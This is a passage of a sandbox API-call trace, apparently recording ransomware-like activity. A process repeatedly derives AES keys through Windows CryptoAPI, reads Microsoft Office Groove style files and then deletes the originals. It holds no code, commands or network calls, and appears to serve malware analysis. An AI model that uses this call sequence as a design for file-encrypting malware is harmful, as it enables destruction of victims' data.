CryptDestroyHash (hHash=0x284d728) returned 1 [0167.222] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0167.222] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0167.223] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\SoftBlue\\tab_off.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\softblue\\tab_off.gif")) returned 1 [0167.225] CryptAcquireContextW (in: phProv=0x3266e8c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3266e8c*=0xa52810) returned 1 [0167.225] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3266e90 | out: phHash=0x3266e90) returned 1 [0167.225] CryptHashData (hHash=0x284d6a8, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0167.225] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x3266e84 | out: phKey=0x3266e84*=0x284d6e8) returned 1 [0167.225] GetFileSize (in: hFile=0x504, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xde [0167.225] ReadFile (in: hFile=0x504, lpBuffer=0x3266f04, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3266e94, lpOverlapped=0x0 | out: lpBuffer=0x3266f04*, lpNumberOfBytesRead=0x3266e94*=0x80, lpOverlapped=0x0) returned 1 [0167.227] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0167.227] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0167.227] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0167.228] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\SoftBlue\\tab_on.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\softblue\\tab_on.gif")) returned 1 [0167.254] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0167.254] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0167.254] CryptHashData (hHash=0x284d668, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0167.254] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0167.254] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe34 [0167.254] ReadFile (in: hFile=0x4e4, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0167.276] CryptDestroyHash (hHash=0x284d668) returned 1 [0167.276] CryptDestroyKey (hKey=0x284d728) returned 1 [0167.276] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0167.277] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\SoftBlue.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\softblue.css")) returned 1 [0167.278] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0167.280] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0167.281] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0167.281] CryptHashData (hHash=0x284d6e8, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0167.281] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6e8, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0167.281] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc3a [0167.281] ReadFile (in: hFile=0x510, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0167.303] CryptDestroyHash (hHash=0x284d6e8) returned 1 [0167.303] CryptDestroyKey (hKey=0x284d728) returned 1 [0167.303] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0167.304] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\SpringGreen.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\springgreen.css")) returned 1 [0167.306] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0167.306] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0167.306] CryptHashData (hHash=0x284d668, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0167.306] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0167.306] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x736 [0167.307] ReadFile (in: hFile=0x4e4, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0167.323] CryptDestroyHash (hHash=0x284d668) returned 1 [0167.323] CryptDestroyKey (hKey=0x284d728) returned 1 [0167.323] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0167.324] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Sts.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\sts.css")) returned 1 [0167.325] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0167.327] CryptAcquireContextW (in: phProv=0x3266e8c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3266e8c*=0xa52810) returned 1 [0167.328] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3266e90 | out: phHash=0x3266e90) returned 1 [0167.328] CryptHashData (hHash=0x284d728, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0167.328] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x3266e84 | out: phKey=0x3266e84*=0x284d668) returned 1 [0167.328] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe9 [0167.328] ReadFile (in: hFile=0x4e4, lpBuffer=0x3266f04, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3266e94, lpOverlapped=0x0 | out: lpBuffer=0x3266f04*, lpNumberOfBytesRead=0x3266e94*=0x80, lpOverlapped=0x0) returned 1 [0167.329] CryptDestroyHash (hHash=0x284d728) returned 1 [0167.329] CryptDestroyKey (hKey=0x284d668) returned 1 [0167.329] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0167.330] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\STS2\\background.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\sts2\\background.gif")) returned 1 [0167.331] CryptAcquireContextW (in: phProv=0x3266e8c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3266e8c*=0xa52810) returned 1 [0167.332] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3266e90 | out: phHash=0x3266e90) returned 1 [0167.332] CryptHashData (hHash=0x284d6a8, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0167.332] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x3266e84 | out: phKey=0x3266e84*=0x284d668) returned 1 [0167.332] GetFileSize (in: hFile=0x504, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xcbd [0167.332] ReadFile (in: hFile=0x504, lpBuffer=0x3266f04, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3266e94, lpOverlapped=0x0 | out: lpBuffer=0x3266f04*, lpNumberOfBytesRead=0x3266e94*=0x80, lpOverlapped=0x0) returned 1 [0167.352] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0167.352] CryptDestroyKey (hKey=0x284d668) returned 1 [0167.352] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0167.353] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\STS2\\header.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\sts2\\header.gif")) returned 1 [0167.354] CryptAcquireContextW (in: phProv=0x3266e8c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3266e8c*=0xa52810) returned 1 [0167.355] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3266e90 | out: phHash=0x3266e90) returned 1 [0167.355] CryptHashData (hHash=0x284d728, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0167.355] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x3266e84 | out: phKey=0x3266e84*=0x284d668) returned 1 [0167.355] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1ce [0167.355] ReadFile (in: hFile=0x4e4, lpBuffer=0x3266f04, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3266e94, lpOverlapped=0x0 | out: lpBuffer=0x3266f04*, lpNumberOfBytesRead=0x3266e94*=0x80, lpOverlapped=0x0) returned 1 [0167.357] CryptDestroyHash (hHash=0x284d728) returned 1 [0167.357] CryptDestroyKey (hKey=0x284d668) returned 1 [0167.357] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0167.358] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\STS2\\tab_off.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\sts2\\tab_off.gif")) returned 1 [0167.359] CryptAcquireContextW (in: phProv=0x3266e8c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3266e8c*=0xa52810) returned 1 [0167.360] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3266e90 | out: phHash=0x3266e90) returned 1 [0167.360] CryptHashData (hHash=0x284d6a8, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0167.360] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x3266e84 | out: phKey=0x3266e84*=0x284d668) returned 1 [0167.360] GetFileSize (in: hFile=0x504, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x108 [0167.360] ReadFile (in: hFile=0x504, lpBuffer=0x3266f04, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3266e94, lpOverlapped=0x0 | out: lpBuffer=0x3266f04*, lpNumberOfBytesRead=0x3266e94*=0x80, lpOverlapped=0x0) returned 1 [0167.362] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0167.362] CryptDestroyKey (hKey=0x284d668) returned 1 [0167.362] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0167.363] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\STS2\\tab_on.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\sts2\\tab_on.gif")) returned 1 [0167.364] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0167.365] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0167.365] CryptHashData (hHash=0x284d6e8, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0167.365] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6e8, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0167.365] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xce8 [0167.365] ReadFile (in: hFile=0x510, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0167.378] CryptDestroyHash (hHash=0x284d6e8) returned 1 [0167.378] CryptDestroyKey (hKey=0x284d728) returned 1 [0167.378] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0167.379] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Sts2.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\sts2.css")) returned 1 [0167.380] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0167.381] CryptAcquireContextW (in: phProv=0x3266e8c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3266e8c*=0xa52810) returned 1 [0167.382] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3266e90 | out: phHash=0x3266e90) returned 1 [0167.382] CryptHashData (hHash=0x284d728, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0167.382] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x3266e84 | out: phKey=0x3266e84*=0x284d6e8) returned 1 [0167.382] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x32f [0167.382] ReadFile (in: hFile=0x510, lpBuffer=0x3266f04, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3266e94, lpOverlapped=0x0 | out: lpBuffer=0x3266f04*, lpNumberOfBytesRead=0x3266e94*=0x80, lpOverlapped=0x0) returned 1 [0167.412] CryptDestroyHash (hHash=0x284d728) returned 1 [0167.412] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0167.412] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0167.413] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Swirl\\background.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\swirl\\background.gif")) returned 1 [0167.414] CryptAcquireContextW (in: phProv=0x3266e8c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3266e8c*=0xa52810) returned 1 [0167.415] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3266e90 | out: phHash=0x3266e90) returned 1 [0167.415] CryptHashData (hHash=0x284d6a8, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0167.415] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x3266e84 | out: phKey=0x3266e84*=0x284d6e8) returned 1 [0167.415] GetFileSize (in: hFile=0x504, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6993 [0167.415] ReadFile (in: hFile=0x504, lpBuffer=0x3266f04, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3266e94, lpOverlapped=0x0 | out: lpBuffer=0x3266f04*, lpNumberOfBytesRead=0x3266e94*=0x80, lpOverlapped=0x0) returned 1 [0167.439] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0167.439] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0167.439] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0167.440] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Swirl\\header.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\swirl\\header.gif")) returned 1 [0167.442] CryptAcquireContextW (in: phProv=0x3266e8c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3266e8c*=0xa52810) returned 1 [0167.442] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3266e90 | out: phHash=0x3266e90) returned 1 [0167.442] CryptHashData (hHash=0x284d728, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0167.442] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x3266e84 | out: phKey=0x3266e84*=0x284d6e8) returned 1 [0167.442] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x155 [0167.442] ReadFile (in: hFile=0x510, lpBuffer=0x3266f04, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3266e94, lpOverlapped=0x0 | out: lpBuffer=0x3266f04*, lpNumberOfBytesRead=0x3266e94*=0x80, lpOverlapped=0x0) returned 1 [0167.444] CryptDestroyHash (hHash=0x284d728) returned 1 [0167.444] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0167.444] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0167.445] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Swirl\\tab_off.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\swirl\\tab_off.gif")) returned 1 [0167.446] CryptAcquireContextW (in: phProv=0x3266e8c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3266e8c*=0xa52810) returned 1 [0167.446] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3266e90 | out: phHash=0x3266e90) returned 1 [0167.447] CryptHashData (hHash=0x284d6a8, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0167.447] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x3266e84 | out: phKey=0x3266e84*=0x284d6e8) returned 1 [0167.447] GetFileSize (in: hFile=0x504, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xde [0167.447] ReadFile (in: hFile=0x504, lpBuffer=0x3266f04, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3266e94, lpOverlapped=0x0 | out: lpBuffer=0x3266f04*, lpNumberOfBytesRead=0x3266e94*=0x80, lpOverlapped=0x0) returned 1 [0167.448] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0167.448] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0167.448] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0167.449] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Swirl\\tab_on.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\swirl\\tab_on.gif")) returned 1 [0167.450] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0167.451] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0167.451] CryptHashData (hHash=0x284d668, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0167.451] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0167.451] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc23 [0167.451] ReadFile (in: hFile=0x4e4, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0167.469] CryptDestroyHash (hHash=0x284d668) returned 1 [0167.469] CryptDestroyKey (hKey=0x284d728) returned 1 [0167.469] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0167.470] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Swirl.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\swirl.css")) returned 1 [0167.472] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0167.472] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0167.472] CryptHashData (hHash=0x284d6e8, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0167.472] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6e8, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0167.472] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x37a [0167.472] ReadFile (in: hFile=0x510, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0167.498] CryptDestroyHash (hHash=0x284d6e8) returned 1 [0167.498] CryptDestroyKey (hKey=0x284d728) returned 1 [0167.498] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0167.500] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Teal.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\teal.css")) returned 1 [0167.501] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0167.502] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0167.502] CryptHashData (hHash=0x284d668, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0167.502] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0167.502] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x37b [0167.502] ReadFile (in: hFile=0x4e4, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0167.520] CryptDestroyHash (hHash=0x284d668) returned 1 [0167.520] CryptDestroyKey (hKey=0x284d728) returned 1 [0167.520] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0167.522] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\TexturedBlue.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\texturedblue.css")) returned 1 [0167.524] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0167.525] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0167.525] CryptHashData (hHash=0x284d6e8, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0167.525] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6e8, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0167.525] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x375 [0167.526] ReadFile (in: hFile=0x510, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0167.532] CryptDestroyHash (hHash=0x284d6e8) returned 1 [0167.532] CryptDestroyKey (hKey=0x284d728) returned 1 [0167.532] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0167.534] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\VelvetRose.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\velvetrose.css")) returned 1 [0167.536] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0167.536] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0167.536] CryptHashData (hHash=0x284d668, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0167.536] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0167.536] GetFileSize 